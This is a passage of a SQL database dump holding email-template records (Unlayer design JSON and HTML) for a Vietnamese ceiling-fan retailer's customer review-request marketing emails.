19px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1595747815584-a.png\\\",\\\"width\\\":204,\\\"height\\\":55,\\\"maxWidth\\\":\\\"26%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"mWDZmdczN4\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 28px; line-height: 39.2px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 39.2px; font-size: 28px;\\\\\\\">Thanks for being with us!<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"gVPK2KUKnF\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 26px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1595747900373-ssss.png\\\",\\\"width\\\":1000,\\\"height\\\":431},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_2\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#017ed0\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"RYZiqC9Ge_\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"_8LBi9___H\\\",\\\"contents\\\":[{\\\"id\\\":\\\"_s7AkbMQ6N\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"28px 33px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#444444\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"200%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 200%;\\\\\\\"><span style=\\\\\\\"font-size: 22px; line-height: 44px;\\\\\\\">Hi,<\\/span><br \\/><span style=\\\\\\\"font-size: 16px; line-height: 32px;\\\\\\\">Thank you again for choosing us for your lorem ipsum dolor.&nbsp;<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 200%;\\\\\\\"><span style=\\\\\\\"font-size: 16px; line-height: 32px;\\\\\\\">If you were happy with the efficiency of the service could I ask that you leave us some brief feedback on your experience via the link below.<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"TYDvAo7QXc\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"KkKlsm36KR\\\",\\\"contents\\\":[{\\\"id\\\":\\\"5XMfCB2N_C\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#272362\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 44px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"40px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"font-size: 16px; line-height: 19.2px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 19.2px; font-size: 16px;\\\\\\\">Review us on Google<\\/span><\\/strong><\\/span>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":248,\\\"calculatedHeight\\\":49}},{\\\"id\\\":\\\"-3M3sEKxbS\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1595748338131-FWsY1nA.png\\\",\\\"width\\\":240,\\\"height\\\":110,\\\"maxWidth\\\":\\\"35%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_3\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"jYPxTblxnF\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"84%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#d8d0d0\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"18px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_1\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_3\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"YbLHtpjkh0\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"jW9WWipw8d\\\",\\\"contents\\\":[{\\\"id\\\":\\\"HG30UIk3ly\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"19px 33px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Source Sans Pro\\\",\\\"value\\\":\\\"\'Source Sans Pro\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"28px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px; font-family: \'Source Sans Pro\', sans-serif;\\\\\\\">Kh\\u00f4ng Ch\\u1ec9 L\\u00e0 M\\u00e1t - M\\u00e0 C\\u00f2n H\\u01a1n Th\\u1ebf N\\u1eefa<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"04gNugS9ys\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"2mvPoFJCm5\\\",\\\"contents\\\":[{\\\"id\\\":\\\"ZA8TJ3zleD\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 4px 4px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"circle-white\\\",\\\"icons\\\":[{\\\"url\\\":\\\" \\\",\\\"name\\\":\\\"Facebook\\\"},{\\\"url\\\":\\\" \\\",\\\"name\\\":\\\"Twitter\\\"},{\\\"url\\\":\\\" \\\",\\\"name\\\":\\\"LinkedIn\\\"},{\\\"url\\\":\\\" \\\",\\\"name\\\":\\\"Instagram\\\"},{\\\"url\\\":\\\" \\\",\\\"name\\\":\\\"YouTube\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":19,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"U54rwmEkOc\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"23px 40px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#b8b8b8\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">T\\u1ed5ng \\u0111\\u00e0i b\\u00e1n h\\u00e0ng: 028.73033369<br \\/>EMAIL: sale@hogiaphat.vn\\u00a0<br \\/>SR Th\\u1ee7 \\u0110\\u1ee9c: 184 Tr\\u1ea7n L\\u1ef1u, An Ph\\u00fa, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp HCM<\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">SR Qu\\u1eadn 7: Happy Valley, 812 Nguy\\u1ec5n V\\u0103n Linh, T\\u00e2n Phong, Qu\\u1eadn 7, Tp HCM<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"8hu9zilO_e\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"91%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#616888\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"19px 19px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_2\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"N9ssy1A_Ok\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#bbbbbb\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 16.8px;\\\\\\\">\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 16.8px;\\\\\\\">C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_6\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#272362\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_5\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#363675\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":false,\\\"linkHoverUnderline\\\":true,\\\"inherit\\\":false},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":12}\"', '', 1, '2023-02-23 14:14:26');
INSERT INTO `tblma_email_templates` (`id`, `name`, `color`, `category`, `published`, `language`, `data_html`, `data_design`, `description`, `addedfrom`, `dateadded`) VALUES
(9, 'Haiku - Quạt trần thông minh của tương lai', '', 0, 1, 'english', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-25 {\\r\\n    width: 150px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-33p33 {\\r\\n    width: 199.98px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } #u_body a { color: #363675; text-decoration: none; } @media (max-width: 480px) { #u_content_social_1 .v-container-padding-padding { padding: 10px !important; } }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Montserrat:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #ffffff;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table id=\\\"u_body\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #ffffff;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n    \\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: 